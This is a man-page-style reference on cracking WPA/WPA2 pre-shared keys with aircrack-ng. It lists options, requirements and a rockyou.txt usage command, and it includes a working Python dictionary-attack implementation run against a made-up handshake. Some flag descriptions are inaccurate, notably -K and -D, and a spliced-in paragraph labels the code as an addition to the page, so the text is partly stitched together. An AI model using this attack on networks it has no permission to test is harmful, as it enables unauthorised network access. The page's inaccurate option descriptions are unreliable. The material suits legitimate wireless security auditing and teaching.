psk-crack
Crack WPA/WPA2 Pre-Shared Keys using a dictionary attack
SYNOPSIS
The PSK cracking functionality is executed using the aircrack-ng command:
aircrack-ng [options] capture_file(s)
PARAMETERS
-w
Specifies the path to a dictionary file (wordlist) containing potential passwords. Each line in the file is treated as a candidate PSK.
-b
Filters the cracking attempt to a specific network by its BSSID (MAC address of the access point).
-e
Filters the cracking attempt to a specific network by its ESSID (network name).
-p
Specifies the number of CPU cores or threads to use for cracking, accelerating the process on multi-core systems.
-K
Activates the WPA-PSK key calculation. Usually implied when using -w with WPA captures.
-D
Enables debug output, useful for troubleshooting.
DESCRIPTION
psk-crack refers to the process of recovering a WPA/WPA2 Pre-Shared Key (PSK) using a dictionary or brute-force attack. There is no standalone Linux command named psk-crack that takes a capture file and wordlist directly; this capability is provided by the aircrack-ng suite, a set of tools designed for auditing wireless networks. To 'psk-crack' using aircrack-ng, you need a captured 4-way WPA/WPA2 handshake (obtained using tools like airodump-ng) and a wordlist containing potential passwords. For each word in the list, aircrack-ng derives the PMK from the candidate passphrase and the ESSID, expands it to the PTK using the MAC addresses and nonces from the captured handshake, and checks whether the resulting key reproduces the MIC in the captured EAPOL frame; a match reveals the PSK.
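The per-candidate check described above, as an added Python example that is not part of aircrack-ng or this page: it derives the PMK with PBKDF2-HMAC-SHA1 over the ESSID, expands it to the PTK with the 802.11i PRF, and compares an HMAC-SHA1 MIC against a constructed WPA2 handshake (the SSID, MAC addresses, nonces, EAPOL frame and wordlist are all made up here). It shows why each candidate costs 4096 HMAC rounds, so time to crack scales with wordlist size and the passphrase's strength decides the outcome.

```python
import hashlib
import hmac
from typing import Iterable, Optional

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes), per IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 'Pairwise key expansion': four HMAC-SHA1 blocks, first 64 bytes form the PTK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]

def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]

def dictionary_attack(wordlist: Iterable[str], ssid: str, ap_mac: bytes, sta_mac: bytes,
                      anonce: bytes, snonce: bytes, eapol_frame: bytes, captured_mic: bytes) -> Optional[str]:
    """Return the candidate whose derived KCK (PTK[:16]) reproduces the captured MIC, else None."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA passphrases are 8..63 characters; skip the rest
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None

# --- Constructed handshake material (hypothetical values, not from a real capture) ---
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Minimal EAPOL-Key message 2: header, descriptor type, key info/length, replay counter,
# SNonce, IV/RSC/ID, the 16-byte MIC field zeroed, and a zero key-data length.
EAPOL_FRAME = (bytes.fromhex("0203005f02") + bytes.fromhex("010a0010") + b"\x00" * 8
               + SNONCE + b"\x00" * (16 + 8 + 8) + b"\x00" * 16 + b"\x00\x00")
WORDLIST = ["password", "12345678", "letmein1", "correct-horse-battery", "qwertyui"]

def captured_mic(true_passphrase: str) -> bytes:
    """The MIC a client that knows true_passphrase would place in message 2 of this handshake."""
    kck = ptk_from_pmk(pmk_from_passphrase(true_passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_FRAME)

if __name__ == "__main__":
    print(dictionary_attack(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_FRAME,
                            captured_mic("correct-horse-battery")))
```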
CAVEATS
Legality: Using this functionality to crack networks you do not own or have explicit permission to test is illegal and unethical. It is intended for legitimate security auditing purposes.
Handshake Requirement: A valid 4-way WPA/WPA2 handshake must be present in the capture file for the cracking process to succeed.
Wordlist Quality: The success of a dictionary attack heavily depends on the quality and comprehensiveness of the provided wordlist. A poor wordlist will likely fail to find the password.
Time Consumption: Cracking can be a very time-consuming process, especially with long wordlists or complex passwords, potentially taking hours, days, or even longer.
Computational Resources: Cracking is CPU-intensive. Utilizing multiple CPU cores (with -p) can significantly speed up the process.
TYPICAL USAGE EXAMPLE
To attempt to crack a WPA/WPA2 PSK from a capture file named handshake.cap using a wordlist named rockyou.txt, you would execute:
aircrack-ng -w /path/to/rockyou.txt /path/to/handshake.cap
If the PSK is found within the wordlist, aircrack-ng will display it.
REQUIREMENTS FOR CRACKING
Before attempting to crack a PSK, ensure you have:
1. A wireless adapter capable of monitor mode (e.g., supported by airmon-ng).
2. A captured WPA/WPA2 4-way handshake. This typically involves capturing traffic while a legitimate client connects or re-connects to the target AP.
3. A comprehensive wordlist.
HISTORY
The concept of cracking WPA/WPA2 PSKs emerged as weaknesses were identified in WPA, particularly its exposure to dictionary attacks against the Pre-Shared Key. The aircrack-ng suite, which consolidates tools for wireless network auditing, became the prominent platform for this functionality. Its development has focused on improving efficiency and supporting various hardware acceleration methods, making it a widely adopted tool for ethical hacking and penetration testing in the wireless security domain since the mid-2000s.
SEE ALSO
aircrack-ng(1), airodump-ng(8), airmon-ng(8), aireplay-ng(8), cowpatty(1), hashcat(1)